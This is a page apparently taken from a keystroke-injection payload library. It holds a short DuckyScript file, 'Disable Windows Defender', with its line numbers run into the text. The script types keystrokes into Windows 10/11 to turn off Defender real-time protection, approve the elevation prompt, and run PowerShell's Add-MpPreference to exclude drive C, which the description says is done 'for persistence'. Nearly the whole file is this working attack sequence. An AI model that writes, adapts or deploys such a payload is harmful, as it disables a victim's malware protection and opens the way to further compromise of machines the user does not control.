Path: blob/master/payloads/library/general/Defeat_Defender/payload.txt
2968 views
REM Title: Disable Windows Defender1REM Author: Zero_Sploit (v1.0)2REM Updated: B33m0 (v1.1)3REM Updated: UberGuidoZ (v1.2)4REM Description: Opens security settings, disabled Defender, then adds an exception of drive C for persistence5REM Target: Windows 10/11 (Powershell)6REM Version: 1.278REM Pause for everything to recognize and be ready9DELAY 20001011REM Open Windows Defender Settings12CTRL ESC13DELAY 75014STRING windows security15DELAY 25016ENTER17DELAY 100018ENTER1920REM Navigate to Manage Settings21DELAY 50022TAB23DELAY 10024TAB25DELAY 10026TAB27DELAY 10028TAB29DELAY 10030ENTER31DELAY 5003233REM Open and turn off Realtime Protection34SPACE35DELAY 100036ALT y37DELAY 10003839REM Exit security settings40ALT F441DELAY 5004243REM Open PowerShell44GUI r45DELAY 50046STRING powershell47CTRL-SHIFT ENTER48DELAY 100049ALT y50DELAY 10005152REM Exclude drive C from Defender53STRING Add-MpPreference -ExclusionPath “C:”54ENTER55DELAY 20005657REM Exit Powershell58STRING EXIT59ENTER606162